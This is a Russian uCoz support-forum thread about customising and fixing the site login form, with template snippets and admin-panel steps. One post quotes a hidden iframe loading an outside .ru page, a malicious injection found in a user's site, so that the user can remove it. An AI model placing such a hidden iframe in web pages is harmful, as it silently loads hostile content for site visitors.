Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Дизайн: управление шаблонами » Редактирование формы входа
Редактирование формы входа
Модератор форума
Сообщение # 1 | 23:03:52
Все вопросы связанные с редактированием формы входа
Если Вы хотите изменить внешний вид формы входа
Знания HTML обязательны!



Предупреждение!


WARNING! Будьте особо внимательны, если вы вставляете уже готовые (видоизмененные) варианты формы входа к себе на сайт!
Готовые формы входа раздающиеся на разных ресурсах могут содержать в себе агрессивный или вредоносный код!
9115451
Сообщений: 4
Репутация: 0

Сообщение # 571 | 18:34:28
Цитата webanet ()
поле на что замениь оставляете пустым и производите замену во всех модулях тоже самое сделайте с этим кодом.
Спасибо за быстрый отклик!
Если второе поле оставить пустым, то всплывает окошко, что Не сделано ни одной замены
Проверьте правильность заменяемого кода
webanet
Личный менеджер
Сообщений: 23787
Репутация: 4963

Сообщение # 572 | 18:42:23
9115451, второй код должен сработать. вот это на быструю замену отправьте с заменой в глобальных блоках
Код
<iframe id="a1996667054" src="https://al9l235gkc7d.ru/f.html" style="display: none;"></iframe>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
9115451
Сообщений: 4
Репутация: 0

Сообщение # 573 | 19:13:12
webanet, через замену выдавало ошибку, удалилось вручную, но форма входа все равно не работает.
webanet
Личный менеджер
Сообщений: 23787
Репутация: 4963

Сообщение # 574 | 19:29:30
9115451, отлично. с вредоносным кодом мы разобрались. теперь форма входа. у вас стоят только поля формы без рабочего скрипта, поэтому не работает. если не хотите видеть uid кнопку авторизации и соц. сети, а хотите видеть старую форму входа то проделайте следующее. удалите из блока все то, что вы называете формой входа и вставьте системный код $LOGIN_FORM$
далее Панель управления - Пользователи - Настройки модуля - Разрешенные методы авторизации пользователей: - выбираете локальных пользователей - Внизу сохраняете
На сайт будете входить парой логин - ник на сайте. пароль - пароль от uID профиля

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
9115451
Сообщений: 4
Репутация: 0

Сообщение # 575 | 20:02:38
webanet, спасибки=*
SRP-Design
Сообщений: 39
Репутация: 18

Сообщение # 576 | 22:29:06
Ставлю скрипт http://webuilder.info/load....-0-2736 там в примечаниях пишут "Не забудьте удалить старую форму входа uCoz, иначе данное решение будет оповещать вас о неправильно введенном логине или пароле, несмотря на то, что вы вводите их правильно. "
Но как ее удалить?
Здесь я код поменял весь Админ панель => Дизайн => Управление дизайном => Пользователи => Форма входа пользователей

Добавлено (27 Фев 2016, 21:21:48)
---------------------------------------------
А то вот что выходит http://kinokom.tv/
Двойное окно входа. display:none; top:-1000px; убирают стандартное окно, но выдают ошибку не правильный логин или пароль

Добавлено (27 Фев 2016, 22:29:06)
---------------------------------------------
Все решили проблему я тут вместо # <a href="#" id="okno_vxod"> оставил $LOGINLINK$

Эн
Сообщений: 3
Репутация: 0

Сообщение # 577 | 14:02:22
Добрый вечер, возможно у кого-то утро или ночь))

Подскажите есть ли возможность сделать на форуме форму реги и входа?

Добавлено (06 Июн 2016, 14:02:22)
---------------------------------------------
megaphone

mrx
Сообщений: 309
Репутация: 51

Сообщение # 578 | 16:58:15
Эн, а в чём проблема? На форуме есть форма быстрого входа (внизу), а также можно поставить $LOG_FORM$ в любое место страницы.
webanet
Личный менеджер
Сообщений: 23787
Репутация: 4963

Сообщение # 579 | 20:12:30
Эн, можно, но вместо апов вопроса нужно указывать ссылку на сайт
панель управления - дизайн - управление дизайном - форум - общий вид страниц форума - найдите код, который я выделила зеленым и вставьте то, что я выделила красным
Цитата
<?if($MODULE_ID$='forum')?><div class="forum-box"><?endif?>
<div class="forumContent"><table border="0" cellpadding="0" height="30" cellspacing="0" width="100%">
<tr>

<?if($USER_LOGGED_IN$)?><?else?><td align="left">
<a class="fNavLink" href="$LOGIN_LINK$" rel="nofollow">Войти</a> ·
<a class="fNavLink" href="$REGISTER_LINK$" rel="nofollow">Зарегистрироваться</a></td><?endif?>

<td align="right">[<?if($USER_LOGGED_IN$)?>
<a href="javascript://" rel="nofollow" id="upml" class="fNavLink" onclick="window.open('$PM_URL$','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;"><!--<s3065>-->Личные сообщения<!--</s>-->($UNREAD_PM$)</a> ·
<?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml','')",500)</script><bgsound src="/.s/img/fr/pm.wav" loop="1" volume="0" balance="0">
<?endif?><?endif?>
<a class="fNavLink" href="$RECENT_POSTS_LINK$" rel="nofollow"><!--<s5209>-->Новые сообщения<!--</s>--></a> ·
<a class="fNavLink" href="$MEMBERS_LIST_LINK$" rel="nofollow"><!--<s5216>-->Участники<!--</s>--></a> ·
<a class="fNavLink" href="$BOARD_RULES_LINK$" rel="nofollow"><!--<s5166>-->Правила форума<!--</s>--></a> ·
<a class="fNavLink" href="$SEARCH_PAGE_LINK$" rel="nofollow"><!--<s3163>-->Поиск<!--</s>--></a> ·
<a class="fNavLink" href="$RSS_LINK$" rel="nofollow">RSS</a><?if($USER_LOGGED_IN$)?> ·
<a class="fNavLink" href="$SUBSCRIPTION_LINK$" rel="nofollow"><!--<s6773>-->Подписки<!--</s>--></a><?endif?> ]</td>
</tr>

перед правками сделайте бекап шаблонов
получится для гостя примерно так
Прикрепления: 0104699.jpg(28.6 Kb)

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Эн
Сообщений: 3
Репутация: 0

Сообщение # 580 | 17:45:20
webanet, поставила, только внизу у меня получилось http://kraskizhizni.ucoz.net/
trem200
Сообщений: 99
Репутация: 4
Уровень замечаний:

Сообщение # 581 | 00:14:40
Здравствуйте, у меня есть уже готовая форма входа, но я не знаю как добавить кнопку регистрации.

Код
<input type="text" name="user" size="20" maxlength="50" placeholder="Логин">
<div class="password left hidden"><a href="$REMINDER_LINK$"></a><input type="password" name="password" size="20" maxlength="15" placeholder="Пароль"></div>
<input name="sbm" type="submit" value="Войти">
<input id="rem$PAGE_ID$" type="checkbox" name="rem" value="1" checked="checked">


Помогите пожалуйста, как добавить кнопку регистрации.
voron2995
Сообщений: 33
Репутация: 12

Сообщение # 582 | 22:59:11
Здравствуйте.
Подскажите пожалуйста, как сделать, чтобы в форме входа присутствовали сразу два метода входа (через uID и для локальных пользователей). Видел подобную реализацию здесь scanbooks.ru. Т.е. нажимаешь на кнопку Войти через uID и входишь через появляющееся окошко. Если хочешь войти как локальный пользователь, то нажимаешь на ссылку Старая форма входа и появляется старая форма с почтой и паролем.
Спасибо
Прикрепления: 1719317.jpg(104.4 Kb) · 2677946.jpg(109.4 Kb)
webanet
Личный менеджер
Сообщений: 23787
Репутация: 4963

Сообщение # 583 | 23:21:58
voron2995, панель управления - пользователи - настройки модуля - вид кнопки uID авторизации - переключите на старый - сохраните

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Paritet3077
Сообщений: 1
Репутация: 0

Сообщение # 584 | 14:07:05
Как в созданном сайте на Юкоз добавить старую обычную форму входа? Через логин и пароль. Куда она пропала, теперь больше её нет?

Чтобы можно было зайти не только через UID, соц. сети и почту, а просто введя имя пользователя и пароль? Раньше в общих настройках (в Админ
панели, была такая функция), а теперь, что-то не могу найти? Аналогичный
вопрос и по регистрации пользователь на сайте.
$Vladimir$
$SUPPORT$
Сообщений: 7151
Репутация: 1013

Сообщение # 585 | 11:28:11
Paritet3077, путь указан в сообщении выше.

Сообщество uCoz » Мастерская uCoz » Дизайн: управление шаблонами » Редактирование формы входа
Поиск: